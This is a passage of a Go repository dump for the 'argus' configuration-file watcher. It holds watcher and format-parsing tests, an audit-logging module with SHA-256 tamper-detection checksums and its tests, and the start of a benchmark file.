		for _, e := range events {
			if e.IsDelete {
				hasDelete = true
				break
			}
		}
		eventsMutex.Unlock()

		if hasDelete {
			t.Logf("Delete event detected after %d attempts, total events: %d", i+1, currentEvents)
			break
		}
		time.Sleep(250 * time.Millisecond)
	}

	// Final wait to catch any late events - reduced for timeout constraints
	time.Sleep(500 * time.Millisecond) // Reduced from 1 second

	// Check events with mutex protection
	eventsMutex.Lock()
	eventCount := len(events)
	eventsCopy := make([]ChangeEvent, len(events))
	copy(eventsCopy, events)
	eventsMutex.Unlock()

	t.Logf("Total events received: %d", eventCount)
	for i, event := range eventsCopy {
		t.Logf("Event %d: IsCreate=%v, IsDelete=%v, IsModify=%v, Path=%s",
			i, event.IsCreate, event.IsDelete, event.IsModify, event.Path)
	}

	// On macOS CI, filesystem events might be very slow or not detected
	// We'll be more lenient and allow the test to pass with fewer events
	if eventCount == 0 {
		// Quick alternative detection for CI environments with timeout constraints
		t.Logf("No events detected, trying quick alternative detection...")

		// Try one more file modification with shorter delay
		if err := os.WriteFile(testFile, []byte(`{"test": 1, "retry": true}`), 0644); err == nil {
			time.Sleep(500 * time.Millisecond) // Much shorter delay for CI

			eventsMutex.Lock()
			currentCount := len(events)
			eventsMutex.Unlock()

			if currentCount > 0 {
				t.Logf("Quick retry successful: %d events", currentCount)
			} else {
				// Try one alternative file quickly
				altFile := filepath.Join(filepath.Dir(testFile), "quick_test.json")
				if err := os.WriteFile(altFile, []byte(`{"quick": true}`), 0644); err == nil {
					_ = watcher.Watch(altFile, func(event ChangeEvent) { // Ignore watch error in test
						eventsMutex.Lock()
						events = append(events, event)
						t.Logf("Quick alt event: %+v", event)
						eventsMutex.Unlock()
					})

					time.Sleep(500 * time.Millisecond) // Short wait only

					eventsMutex.Lock()
					currentCount = len(events)
					eventsMutex.Unlock()

					if currentCount > 0 {
						t.Logf("Quick alternative detection successful: %d events", currentCount)
					}
				}
			}
		}

		eventsMutex.Lock()
		finalEventCount := len(events)
		eventsMutex.Unlock()

		if finalEventCount == 0 {
			t.Skip("No file events detected - this appears to be a macOS CI filesystem limitation")
		}

		t.Logf("Alternative detection successful: %d events", finalEventCount)
		// Continue with the test using the events we got
		eventsMutex.Lock()
		eventCount = len(events)
		eventsCopy = make([]ChangeEvent, len(events))
		copy(eventsCopy, events)
		eventsMutex.Unlock()
	} // Look for create-like events (creation or first modification)
	hasCreateActivity := false
	hasDeleteActivity := false

	for _, event := range eventsCopy {
		if event.IsCreate || (event.IsModify && !event.IsDelete) {
			hasCreateActivity = true
		}
		if event.IsDelete {
			hasDeleteActivity = true
		}
	}

	if !hasCreateActivity {
		t.Errorf("Expected file creation activity, but none detected")
	}

	// Delete detection might be less reliable on some filesystems
	if !hasDeleteActivity {
		t.Logf("Warning: Delete event not detected - this might be filesystem-dependent")
	}

	// Ensure we have reasonable activity
	if eventCount < 1 {
		t.Errorf("Expected at least 1 file event, got %d", eventCount)
	}
}

// TestWatcherMultipleFiles tests watching multiple files
func TestWatcherMultipleFiles(t *testing.T) {
	tmpDir := t.TempDir()
	file1 := filepath.Join(tmpDir, "config1.json")
	file2 := filepath.Join(tmpDir, "config2.json")

	// Create test files
	if err := os.WriteFile(file1, []byte(`{"file": 1}`), 0644); err != nil {
		t.Fatalf("Failed to create file1: %v", err)
	}
	if err := os.WriteFile(file2, []byte(`{"file": 2}`), 0644); err != nil {
		t.Fatalf("Failed to create file2: %v", err)
	}

	watcher := New(Config{
		PollInterval: 100 * time.Millisecond,
		CacheTTL:     50 * time.Millisecond,
	})

	changes := make(map[string]int)
	var changesMutex sync.Mutex
	callback := func(event ChangeEvent) {
		changesMutex.Lock()
		changes[event.Path]++
		changesMutex.Unlock()
	}

	// Watch both files
	if err := watcher.Watch(file1, callback); err != nil {
		t.Fatalf("Failed to watch file1: %v", err)
	}
	if err := watcher.Watch(file2, callback); err != nil {
		t.Fatalf("Failed to watch file2: %v", err)
	}

	if watcher.WatchedFiles() != 2 {
		t.Errorf("Expected 2 watched files, got %d", watcher.WatchedFiles())
	}

	if err := watcher.Start(); err != nil {
		t.Fatalf("Failed to start watcher: %v", err)
	}
	defer func() { _ = watcher.Stop() }() // Ignore cleanup errors in tests

	time.Sleep(150 * time.Millisecond) // Initial scan

	// Modify both files
	if err := os.WriteFile(file1, []byte(`{"file": 1, "modified": true}`), 0644); err != nil {
		t.Fatalf("Failed to modify file1: %v", err)
	}
	if err := os.WriteFile(file2, []byte(`{"file": 2, "modified": true}`), 0644); err != nil {
		t.Fatalf("Failed to modify file2: %v", err)
	}

	time.Sleep(200 * time.Millisecond)

	// Both files should have been detected
	if changes[file1] == 0 {
		t.Errorf("No changes detected for file1")
	}
	if changes[file2] == 0 {
		t.Errorf("No changes detected for file2")
	}
}

// TestWatcherUnwatch tests removing files from watch list
func TestWatcherUnwatch(t *testing.T) {
	tmpDir := t.TempDir()
	testFile := filepath.Join(tmpDir, "unwatch_test.json")

	if err := os.WriteFile(testFile, []byte(`{"test": true}`), 0644); err != nil {
		t.Fatalf("Failed to create test file: %v", err)
	}

	watcher := New(Config{
		PollInterval: 100 * time.Millisecond,
	})

	var mu sync.Mutex
	changeCount := 0
	if err := watcher.Watch(testFile, func(event ChangeEvent) {
		mu.Lock()
		changeCount++
		mu.Unlock()
	}); err != nil {
		t.Fatalf("Failed to watch file: %v", err)
	}

	if watcher.WatchedFiles() != 1 {
		t.Errorf("Expected 1 watched file, got %d", watcher.WatchedFiles())
	}

	// Unwatch the file
	if err := watcher.Unwatch(testFile); err != nil {
		t.Fatalf("Failed to unwatch file: %v", err)
	}

	if watcher.WatchedFiles() != 0 {
		t.Errorf("Expected 0 watched files after unwatch, got %d", watcher.WatchedFiles())
	}
}

// TestWatcherCacheStats tests cache statistics
func TestWatcherCacheStats(t *testing.T) {
	tmpDir := t.TempDir()
	testFile := filepath.Join(tmpDir, "stats_test.json")

	if err := os.WriteFile(testFile, []byte(`{"test": true}`), 0644); err != nil {
		t.Fatalf("Failed to create test file: %v", err)
	}

	watcher := New(Config{
		CacheTTL: 1 * time.Second,
	})

	// Initial stats should be empty
	stats := watcher.GetCacheStats()
	if stats.Entries != 0 {
		t.Errorf("Expected 0 cache entries initially, got %d", stats.Entries)
	}

	// Add some cache entries
	_, _ = watcher.getStat(testFile)
	_, _ = watcher.getStat(filepath.Join(tmpDir, "nonexistent.json"))

	stats = watcher.GetCacheStats()
	if stats.Entries != 2 {
		t.Errorf("Expected 2 cache entries, got %d", stats.Entries)
	}

	// Clear cache
	watcher.ClearCache()
	stats = watcher.GetCacheStats()
	if stats.Entries != 0 {
		t.Errorf("Expected 0 cache entries after clear, got %d", stats.Entries)
	}
}

func TestUniversalFormats(t *testing.T) {
	// Create a temporary directory for test files
	tmpDir, err := os.MkdirTemp("", "argus_universal_test_")
	if err != nil {
		t.Fatalf("Failed to create temp dir: %v", err)
	}
	defer func() { _ = os.RemoveAll(tmpDir) }() // Ignore cleanup errors in tests

	// Test configurations for each format
	testConfigs := map[string]string{
		"config.json": `{
			"service_name": "test-service",
			"port": 8080,
			"log_level": "debug",
			"enabled": true
		}`,
		"config.yml": `service_name: test-service
port: 8080
log_level: debug
enabled: true`,
		"config.toml": `service_name = "test-service"
port = 8080
log_level = "debug"
enabled = true`,
		"config.hcl": `service_name = "test-service"
port = 8080
log_level = "debug"
enabled = true`,
		"config.ini": `[service]
service_name = test-service
port = 8080
log_level = debug
enabled = true`,
		"config.properties": `service.name=test-service
server.port=8080
log.level=debug
feature.enabled=true`,
	}

	// Test each format
	for filename, content := range testConfigs {
		t.Run(filename, func(t *testing.T) {
			// Write test file
			filePath := filepath.Join(tmpDir, filename)
			err := os.WriteFile(filePath, []byte(content), 0644)
			if err != nil {
				t.Fatalf("Failed to write test file %s: %v", filename, err)
			}

			// Set up callback to capture config changes
			var capturedConfig map[string]interface{}
			callbackCalled := make(chan bool, 1)

			callback := func(config map[string]interface{}) {
				capturedConfig = config
				callbackCalled <- true
			}

			// Start watching
			watcher, err := UniversalConfigWatcher(filePath, callback)
			if err != nil {
				t.Fatalf("Failed to create watcher for %s: %v", filename, err)
			}
			defer func() { _ = watcher.Stop() }() // Ignore cleanup errors in tests

			// Wait for initial callback or timeout
			select {
			case <-callbackCalled:
				// Success - config was loaded
			case <-time.After(2 * time.Second):
				t.Fatalf("Timeout waiting for initial config load for %s", filename)
			}

			// Verify config was parsed
			if capturedConfig == nil {
				t.Fatalf("No config captured for %s", filename)
			}

			t.Logf("✅ Successfully parsed %s: %+v", filename, capturedConfig)
		})
	}
}

func TestDetectFormatPerfect(t *testing.T) {
	tests := []struct {
		filename string
		expected ConfigFormat
	}{
		{"config.json", FormatJSON},
		{"app.yml", FormatYAML},
		{"docker-compose.yaml", FormatYAML},
		{"Cargo.toml", FormatTOML},
		{"terraform.hcl", FormatHCL},
		{"main.tf", FormatHCL},
		{"app.ini", FormatINI},
		{"system.conf", FormatINI},
		{"server.cfg", FormatINI},
		{"application.properties", FormatProperties},
		{"unknown.txt", FormatUnknown},
	}

	for _, test := range tests {
		t.Run(test.filename, func(t *testing.T) {
			format := DetectFormat(test.filename)
			if format != test.expected {
				t.Errorf("DetectFormat(%s) = %v, expected %v", test.filename, format, test.expected)
			}
		})
	}
}

func TestParseConfigFormatsPerfect(t *testing.T) {
	tests := []struct {
		name    string
		format  ConfigFormat
		content string
		wantKey string
		wantVal interface{}
	}{
		{
			name:    "JSON",
			format:  FormatJSON,
			content: `{"service": "test", "port": 8080}`,
			wantKey: "service",
			wantVal: "test",
		},
		{
			name:    "YAML",
			format:  FormatYAML,
			content: "service: test\nport: 8080",
			wantKey: "service",
			wantVal: "test",
		},
		{
			name:    "TOML",
			format:  FormatTOML,
			content: `service = "test"` + "\n" + `port = 8080`,
			wantKey: "service",
			wantVal: "test",
		},
		{
			name:    "HCL",
			format:  FormatHCL,
			content: `service = "test"` + "\n" + `port = 8080`,
			wantKey: "service",
			wantVal: "test",
		},
		{
			name:    "Properties",
			format:  FormatProperties,
			content: "service.name=test\nserver.port=8080",
			wantKey: "service.name",
			wantVal: "test",
		},
	}

	for _, test := range tests {
		t.Run(test.name, func(t *testing.T) {
			config, err := ParseConfig([]byte(test.content), test.format)
			if err != nil {
				t.Fatalf("ParseConfig failed for %s: %v", test.name, err)
			}

			if config[test.wantKey] != test.wantVal {
				t.Errorf("Expected %s=%v, got %v", test.wantKey, test.wantVal, config[test.wantKey])
			}
		})
	}
}

```

## /assets/banner.png

Binary file available at https://raw.githubusercontent.com/agilira/argus/refs/heads/main/assets/banner.png

## /audit.go

```go path="/audit.go" 
// audit.go: Comprehensive audit trail system for Argus
//
// This provides security audit logging for all configuration changes,
// ensuring full accountability and traceability in production environments.
//
// Features:
// - Immutable audit logs with tamper detection
// - Structured logging with context
// - Performance optimized (sub-microsecond impact)
// - Configurable audit levels and outputs
//
// Copyright (c) 2025 AGILira
// Series: AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"crypto/sha256"
	"fmt"
	"os"
	"sync"
	"time"

	"github.com/agilira/go-timecache"
)

// AuditLevel represents the severity of audit events
type AuditLevel int

const (
	AuditInfo AuditLevel = iota
	AuditWarn
	AuditCritical
	AuditSecurity
)

func (al AuditLevel) String() string {
	switch al {
	case AuditInfo:
		return "INFO"
	case AuditWarn:
		return "WARN"
	case AuditCritical:
		return "CRITICAL"
	case AuditSecurity:
		return "SECURITY"
	default:
		return "UNKNOWN"
	}
}

// AuditEvent represents a single auditable event
type AuditEvent struct {
	Timestamp   time.Time              `json:"timestamp"`
	Level       AuditLevel             `json:"level"`
	Event       string                 `json:"event"`
	Component   string                 `json:"component"`
	FilePath    string                 `json:"file_path,omitempty"`
	OldValue    interface{}            `json:"old_value,omitempty"`
	NewValue    interface{}            `json:"new_value,omitempty"`
	UserAgent   string                 `json:"user_agent,omitempty"`
	ProcessID   int                    `json:"process_id"`
	ProcessName string                 `json:"process_name"`
	Context     map[string]interface{} `json:"context,omitempty"`
	Checksum    string                 `json:"checksum"` // For tamper detection
}

// AuditConfig configures the audit system
type AuditConfig struct {
	Enabled       bool          `json:"enabled"`
	OutputFile    string        `json:"output_file"`
	MinLevel      AuditLevel    `json:"min_level"`
	BufferSize    int           `json:"buffer_size"`
	FlushInterval time.Duration `json:"flush_interval"`
	IncludeStack  bool          `json:"include_stack"`
}

// DefaultAuditConfig returns secure default audit configuration with unified SQLite storage.
//
// The default configuration uses the unified SQLite audit system, which consolidates
// all Argus audit events into a single system-wide database. This provides:
//   - Cross-component event correlation
//   - Efficient storage and querying
//   - Automatic schema management
//   - WAL mode for concurrent access
//
// For applications requiring JSONL format, specify OutputFile with .jsonl extension.
func DefaultAuditConfig() AuditConfig {
	// Use empty OutputFile to trigger unified SQLite backend selection
	// The backend will automatically use the system audit database path
	return AuditConfig{
		Enabled:       true,
		OutputFile:    "", // Empty triggers unified SQLite backend
		MinLevel:      AuditInfo,
		BufferSize:    1000,
		FlushInterval: 5 * time.Second,
		IncludeStack:  false,
	}
}

// AuditLogger provides high-performance audit logging with pluggable backends.
//
// This logger implements a unified audit system that automatically selects
// the optimal storage backend (SQLite for unified system audit, JSONL for
// backward compatibility) while maintaining the same public API.
//
// The logger uses buffering and background flushing for optimal performance
// in high-throughput scenarios while ensuring audit integrity.
type AuditLogger struct {
	config      AuditConfig
	backend     auditBackend // Pluggable storage backend (SQLite or JSONL)
	buffer      []AuditEvent
	bufferMu    sync.Mutex
	flushTicker *time.Ticker
	stopCh      chan struct{}
	processID   int
	processName string
}

// NewAuditLogger creates a new audit logger with automatic backend selection.
//
// The logger automatically selects the optimal audit backend based on system
// capabilities and configuration:
//   - SQLite unified backend for consolidation (preferred)
//   - JSONL fallback for compatibility
//
// This approach ensures seamless migration to unified audit trails while
// maintaining backward compatibility with existing configurations.
//
// Parameters:
//   - config: Audit configuration specifying behavior and output preferences
//
// Returns:
//   - Configured audit logger ready for use
//   - Error if both backend initialization attempts fail
func NewAuditLogger(config AuditConfig) (*AuditLogger, error) {
	// Initialize backend using automatic selection
	backend, err := createAuditBackend(config)
	if err != nil {
		return nil, fmt.Errorf("failed to initialize audit backend: %w", err)
	}

	logger := &AuditLogger{
		config:      config,
		backend:     backend,
		buffer:      make([]AuditEvent, 0, config.BufferSize),
		stopCh:      make(chan struct{}),
		processID:   os.Getpid(),
		processName: getProcessName(),
	}

	// Start background flusher
	if config.FlushInterval > 0 {
		logger.flushTicker = time.NewTicker(config.FlushInterval)
		go logger.flushLoop()
	}

	return logger, nil
}

// Log records an audit event with ultra-high performance
func (al *AuditLogger) Log(level AuditLevel, event, component, filePath string, oldVal, newVal interface{}, context map[string]interface{}) {
	if al == nil || al.backend == nil || !al.config.Enabled || level < al.config.MinLevel {
		return
	}

	// Use cached timestamp for performance (121x faster than time.Now())
	timestamp := timecache.CachedTime()

	auditEvent := AuditEvent{
		Timestamp:   timestamp,
		Level:       level,
		Event:       event,
		Component:   component,
		FilePath:    filePath,
		OldValue:    oldVal,
		NewValue:    newVal,
		ProcessID:   al.processID,
		ProcessName: al.processName,
		Context:     context,
	}

	// Generate tamper-detection checksum
	auditEvent.Checksum = al.generateChecksum(auditEvent)

	// Buffer the event
	al.bufferMu.Lock()
	al.buffer = append(al.buffer, auditEvent)
	if len(al.buffer) >= al.config.BufferSize {
		_ = al.flushBufferUnsafe() // Ignore flush errors during buffering to maintain performance
	}
	al.bufferMu.Unlock()
}

// LogConfigChange logs configuration file changes (most common use case)
func (al *AuditLogger) LogConfigChange(filePath string, oldConfig, newConfig map[string]interface{}) {
	al.Log(AuditCritical, "config_change", "argus", filePath, oldConfig, newConfig, nil)
}

// LogFileWatch logs file watch events
func (al *AuditLogger) LogFileWatch(event, filePath string) {
	al.Log(AuditInfo, event, "argus", filePath, nil, nil, nil)
}

// LogSecurityEvent logs security-related events
func (al *AuditLogger) LogSecurityEvent(event, details string, context map[string]interface{}) {
	al.Log(AuditSecurity, event, "argus", "", nil, nil, context)
}

// Flush immediately writes all buffered events
func (al *AuditLogger) Flush() error {
	al.bufferMu.Lock()
	defer al.bufferMu.Unlock()
	return al.flushBufferUnsafe()
}

// Close gracefully shuts down the audit logger
func (al *AuditLogger) Close() error {
	close(al.stopCh)
	if al.flushTicker != nil {
		al.flushTicker.Stop()
	}

	// Final flush to ensure all events are persisted
	if err := al.Flush(); err != nil {
		return fmt.Errorf("failed to flush audit logger during close: %w", err)
	}

	// Close backend and release resources
	if al.backend != nil {
		if err := al.backend.Close(); err != nil {
			return fmt.Errorf("failed to close audit backend: %w", err)
		}
	}

	return nil
}

// flushLoop runs the background flush process
func (al *AuditLogger) flushLoop() {
	for {
		select {
		case <-al.flushTicker.C:
			_ = al.Flush() // Ignore flush errors in background process to maintain performance
		case <-al.stopCh:
			return
		}
	}
}

// flushBufferUnsafe writes buffer to backend storage (caller must hold bufferMu).
//
// This method delegates to the configured backend (SQLite or JSONL) for
// actual persistence. It handles batch writing for optimal performance
// and proper error handling with buffer management.
func (al *AuditLogger) flushBufferUnsafe() error {
	if len(al.buffer) == 0 {
		return nil
	}

	// Write batch to backend
	if err := al.backend.Write(al.buffer); err != nil {
		return fmt.Errorf("failed to write audit events to backend: %w", err)
	}

	// Clear buffer after successful write
	al.buffer = al.buffer[:0]
	return nil
}

// generateChecksum creates a tamper-detection checksum using SHA-256
func (al *AuditLogger) generateChecksum(event AuditEvent) string {
	// Cryptographic hash for tamper detection
	data := fmt.Sprintf("%s:%s:%s:%v:%v",
		event.Timestamp.Format(time.RFC3339Nano),
		event.Event, event.Component, event.OldValue, event.NewValue)
	hash := sha256.Sum256([]byte(data))
	return fmt.Sprintf("%x", hash)
}

// Helper functions
func getProcessName() string {
	return "argus" // Could read from /proc/self/comm
}

```

## /audit_test.go

```go path="/audit_test.go" 
// audit_test.go - Comprehensive test suite for Argus audit system
//
// Copyright (c) 2025 AGILira - A. Giordano
// Series: an AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"os"
	"testing"
	"time"
)

func TestAuditLogger(t *testing.T) {
	// Create temporary audit file
	tmpFile, err := os.CreateTemp("", "audit-*.jsonl")
	if err != nil {
		t.Fatal(err)
	}
	defer func() {
		if err := os.Remove(tmpFile.Name()); err != nil {
			t.Errorf("Failed to remove tmpFile: %v", err)
		}
	}()
	if err := tmpFile.Close(); err != nil {
		t.Errorf("Failed to close tmpFile: %v", err)
	}

	// Create audit config
	config := AuditConfig{
		Enabled:       true,
		OutputFile:    tmpFile.Name(),
		MinLevel:      AuditInfo,
		BufferSize:    10,
		FlushInterval: 100 * time.Millisecond,
		IncludeStack:  false,
	}

	// Create audit logger
	auditor, err := NewAuditLogger(config)
	if err != nil {
		t.Fatal(err)
	}
	defer func() {
		if err := auditor.Close(); err != nil {
			t.Errorf("Failed to close auditor: %v", err)
		}
	}()

	// Test file watch audit
	auditor.LogFileWatch("test_event", "/test/path")

	// Test config change audit
	oldConfig := map[string]interface{}{
		"log_level": "info",
		"port":      8080,
	}
	newConfig := map[string]interface{}{
		"log_level": "debug",
		"port":      9090,
	}
	auditor.LogConfigChange("/test/config.json", oldConfig, newConfig)

	// Force flush
	if err := auditor.Flush(); err != nil {
		t.Errorf("Failed to flush auditor: %v", err)
	}

	// Wait a bit
	time.Sleep(200 * time.Millisecond)

	// Read audit file
	auditData, err := os.ReadFile(tmpFile.Name())
	if err != nil {
		t.Fatal(err)
	}

	auditString := string(auditData)
	if len(auditString) == 0 {
		t.Fatal("Expected audit output, got empty file")
	}

	t.Logf("✅ Audit output:\n%s", auditString)

	// Basic validation that we have JSON audit entries
	lines := string(auditData)
	if len(lines) == 0 {
		t.Error("Expected audit entries")
	}
}

func TestWatcherWithAudit(t *testing.T) {
	// Create temporary config file
	tmpFile, err := os.CreateTemp("", "test-config-*.json")
	if err != nil {
		t.Fatal(err)
	}
	defer func() {
		if err := os.Remove(tmpFile.Name()); err != nil {
			t.Errorf("Failed to remove tmpFile: %v", err)
		}
	}()

	// Write initial config
	initialConfig := `{"log_level": "info", "port": 8080}`
	if _, err := tmpFile.WriteString(initialConfig); err != nil {
		t.Fatal(err)
	}
	if err := tmpFile.Close(); err != nil {
		t.Errorf("Failed to close tmpFile: %v", err)
	}

	// Create temporary audit file
	auditFile, err := os.CreateTemp("", "audit-*.jsonl")
	if err != nil {
		t.Fatal(err)
	}
	defer func() {
		if err := os.Remove(auditFile.Name()); err != nil {
			t.Errorf("Failed to remove auditFile: %v", err)
		}
	}()
	if err := auditFile.Close(); err != nil {
		t.Errorf("Failed to close auditFile: %v", err)
	}

	// Create watcher with audit
	config := Config{
		Audit: AuditConfig{
			Enabled:       true,
			OutputFile:    auditFile.Name(),
			MinLevel:      AuditInfo,
			BufferSize:    10,
			FlushInterval: 100 * time.Millisecond,
			IncludeStack:  false,
		},
	}

	// Set up config watching
	changeDetected := make(chan bool, 1)
	watcher, err := UniversalConfigWatcherWithConfig(tmpFile.Name(), func(config map[string]interface{}) {
		t.Logf("Config changed: %+v", config)
		select {
		case changeDetected <- true:
		default:
		}
	}, config)
	if err != nil {
		t.Fatal(err)
	}

	// Wait a bit for initial setup
	time.Sleep(100 * time.Millisecond)

	// Modify config file
	updatedConfig := `{"log_level": "debug", "port": 9090}`
	if err := os.WriteFile(tmpFile.Name(), []byte(updatedConfig), 0644); err != nil {
		t.Fatal(err)
	}

	// Wait for change detection
	select {
	case <-changeDetected:
		t.Log("✅ Config change detected")
	case <-time.After(2 * time.Second):
		t.Fatal("Timeout waiting for config change")
	}

	// Stop watcher and flush audit
	if err := watcher.Stop(); err != nil {
		t.Errorf("Failed to stop watcher: %v", err)
	}
	if watcher.auditLogger != nil {
		if err := watcher.auditLogger.Flush(); err != nil {
			t.Errorf("Failed to flush auditLogger: %v", err)
		}
		time.Sleep(200 * time.Millisecond)
	}

	// Check audit output
	auditData, err := os.ReadFile(auditFile.Name())
	if err != nil {
		t.Fatal(err)
	}

	auditOutput := string(auditData)
	if auditOutput == "" {
		t.Error("Expected audit output for config changes")
	} else {
		t.Logf("✅ Audit trail captured:\n%s", auditOutput)
	}
}

func TestAuditLoggerTamperDetection(t *testing.T) {
	// Create temporary audit file
	tmpFile, err := os.CreateTemp("", "audit-tamper-*.jsonl")
	if err != nil {
		t.Fatal(err)
	}
	defer func() {
		if err := os.Remove(tmpFile.Name()); err != nil {
			t.Errorf("Failed to remove tmpFile: %v", err)
		}
	}()
	if err := tmpFile.Close(); err != nil {
		t.Errorf("Failed to close tmpFile: %v", err)
	}

	config := AuditConfig{
		Enabled:       true,
		OutputFile:    tmpFile.Name(),
		MinLevel:      AuditInfo,
		BufferSize:    5,
		FlushInterval: 50 * time.Millisecond,
		IncludeStack:  false,
	}

	auditor, err := NewAuditLogger(config)
	if err != nil {
		t.Fatal(err)
	}

	// Log some events
	auditor.LogFileWatch("test1", "/path1")
	auditor.LogFileWatch("test2", "/path2")
	auditor.LogConfigChange("/config", nil, map[string]interface{}{"key": "value"})

	if err := auditor.Flush(); err != nil {
		t.Errorf("Failed to flush auditor: %v", err)
	}
	if err := auditor.Close(); err != nil {
		t.Errorf("Failed to close auditor: %v", err)
	}

	// Read and verify audit entries
	auditData, err := os.ReadFile(tmpFile.Name())
	if err != nil {
		t.Fatal(err)
	}

	if len(auditData) == 0 {
		t.Error("Expected audit entries with checksums")
		return
	}

	t.Logf("✅ Generated audit entries with tamper detection")
	t.Logf("Audit content: %s", string(auditData))
}

func TestAuditLevel_String(t *testing.T) {
	tests := []struct {
		level    AuditLevel
		expected string
	}{
		{AuditInfo, "INFO"},
		{AuditWarn, "WARN"},
		{AuditCritical, "CRITICAL"},
		{AuditSecurity, "SECURITY"},
		{AuditLevel(999), "UNKNOWN"}, // Test invalid level
	}

	for _, test := range tests {
		if got := test.level.String(); got != test.expected {
			t.Errorf("AuditLevel(%d).String() = %q, want %q", test.level, got, test.expected)
		}
	}
}

```

## /benchmark_test.go

```go path="/benchmark_test.go" 
// benchmark_test.go - Argus Benchmark Tests
//
// Copyright (c) 2025 AGILira - A. Giordano
// Series: an AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"fmt"
	"os"
	"path/filepath"
	"testing"
	"time"
)

// Benchmark for the hyper-optimized DetectFormat function
func BenchmarkDetectFormatOptimized(b *testing.B) {
	testFiles := []string{
		"config.json",            // Common case
		"app.yml",                // 3-char extension
		"docker-compose.yaml",    // 4-char extension
		"Cargo.toml",             // Different format
		"terraform.hcl",          // HCL format
		"main.tf",                // Short HCL
		"app.ini",                // INI format
		"system.conf",            // CONF format
		"server.cfg",             // CFG format
		"application.properties", // Long extension
		"service.config",         // CONFIG format
	}

	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		for _, file := range testFiles {
			DetectFormat(file)
		}
	}
}

// Benchmark single file format detection (most common case)
func BenchmarkDetectFormatSingleOptimized(b *testing.B) {
	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		DetectFormat("config.json") // Most common case
	}
}

// Benchmark ParseConfig without custom parsers (built-in only) - OPTIMIZED
func BenchmarkParseConfigBuiltinOnlyOptimized(b *testing.B) {
	// Test different JSON sizes to verify scalability
	testCases := []struct {
		name string
		data []byte
	}{
		{"small", []byte(`{"service": "test", "port": 8080, "enabled": true}`)},
		{"medium", []byte(`{"service": "test", "port": 8080, "enabled": true, "database": {"host": "localhost", "port": 5432, "name": "testdb"}, "features": ["auth", "logging", "metrics"]}`)},
		{"large", []byte(`{"service": "test", "port": 8080, "enabled": true, "database": {"host": "localhost", "port": 5432, "name": "testdb", "pool": {"min": 5, "max": 100}}, "features": ["auth", "logging", "metrics", "tracing"], "config": {"timeout": 30, "retries": 3, "backoff": 1.5}, "servers": [{"name": "server1", "host": "10.0.0.1"}, {"name": "server2", "host": "10.0.0.2"}]}`)},
	}

	// Ensure no custom parsers are registered
	parserMutex.Lock()
	originalParsers := customParsers
	customParsers = nil
	parserMutex.Unlock()
	defer func() {
		parserMutex.Lock()
		customParsers = originalParsers
		parserMutex.Unlock()
	}()

	for _, tc := range testCases {
		b.Run(tc.name, func(b *testing.B) {
			b.ResetTimer()
			for i := 0; i < b.N; i++ {
				_, err := ParseConfig(tc.data, FormatJSON)
				if err != nil {
					b.Fatal(err)
				}
			}
		})
	}
}

// Benchmark ParseConfig with custom parser registered (but not used)
func BenchmarkParseConfigWithCustomParser(b *testing.B) {
	jsonContent := []byte(`{"service": "test", "port": 8080, "enabled": true}`)

	// Save original state
	parserMutex.Lock()
	originalParsers := make([]ConfigParser, len(customParsers))
	copy(originalParsers, customParsers)
	customParsers = nil
	parserMutex.Unlock()
	defer func() {
		parserMutex.Lock()
		customParsers = originalParsers
		parserMutex.Unlock()
	}()

	// Register a custom YAML parser (won't be used for JSON)
	testParser := &testParserForBenchmark{}
	RegisterParser(testParser)

	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		_, err := ParseConfig(jsonContent, FormatJSON)
		if err != nil {
			b.Fatal(err)
		}
	}
}

// Benchmark ParseConfig with custom parser being used
func BenchmarkParseConfigCustomParserUsed(b *testing.B) {
	yamlContent := []byte(`service: test
port: 8080
enabled: true`)

	// Save original state
	parserMutex.Lock()
	originalParsers := make([]ConfigParser, len(customParsers))
	copy(originalParsers, customParsers)
	customParsers = nil
	parserMutex.Unlock()
	defer func() {
		parserMutex.Lock()
		customParsers = originalParsers
		parserMutex.Unlock()
	}()

	// Register a custom YAML parser
	testParser := &testParserForBenchmark{}
	RegisterParser(testParser)

	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		_, err := ParseConfig(yamlContent, FormatYAML)
		if err != nil {
			b.Fatal(err)
		}
	}
}

// Benchmark parser registration (thread safety overhead)
func BenchmarkParserRegistration(b *testing.B) {
	// Save original state
	parserMutex.Lock()
	originalParsers := make([]ConfigParser, len(customParsers))
	copy(originalParsers, customParsers)
	parserMutex.Unlock()
	defer func() {
		parserMutex.Lock()
		customParsers = originalParsers
		parserMutex.Unlock()
	}()

	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		// Clear and re-register to test registration performance
		parserMutex.Lock()
		customParsers = nil
		parserMutex.Unlock()

		RegisterParser(&testParserForBenchmark{})
	}
}

// Benchmark core Watcher operations (moved from other files for consolidation)
func BenchmarkWatcherGetStatOptimized(b *testing.B) {
	tmpFile, err := os.CreateTemp("", "argus_bench_")
	if err != nil {
		b.Fatalf("Failed to create temp file: %v", err)
	}
	defer func() {
		if err := os.Remove(tmpFile.Name()); err != nil {
			b.Errorf("Failed to remove tmpFile: %v", err)
		}
	}()
	if err := tmpFile.Close(); err != nil {
		b.Errorf("Failed to close tmpFile: %v", err)
	}

	watcher := New(Config{CacheTTL: time.Hour}) // Long TTL for cache hit testing
	if err := watcher.Start(); err != nil {
		b.Fatalf("Failed to start watcher: %v", err)
	}
	defer func() {
		if err := watcher.Stop(); err != nil {
			b.Errorf("Failed to stop watcher: %v", err)
		}
	}()

	// Prime the cache
	if _, err := watcher.getStat(tmpFile.Name()); err != nil {
		b.Logf("Failed to get stat: %v", err)
	}

	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		if _, err := watcher.getStat(tmpFile.Name()); err != nil {
			b.Logf("Failed to get stat: %v", err)
		} // Should be cache hit
	}
}

// Benchmark cache miss performance
func BenchmarkWatcherGetStatCacheMiss(b *testing.B) {
	tmpFile, err := os.CreateTemp("", "argus_bench_")
	if err != nil {
		b.Fatalf("Failed to create temp file: %v", err)
	}
	defer func() {
		if err := os.Remove(tmpFile.Name()); err != nil {
			b.Errorf("Failed to remove tmpFile: %v", err)
		}
	}()
	if err := tmpFile.Close(); err != nil {
		b.Errorf("Failed to close tmpFile: %v", err)
	}

	watcher := New(Config{CacheTTL: 0}) // No caching - always miss
	if err := watcher.Start(); err != nil {
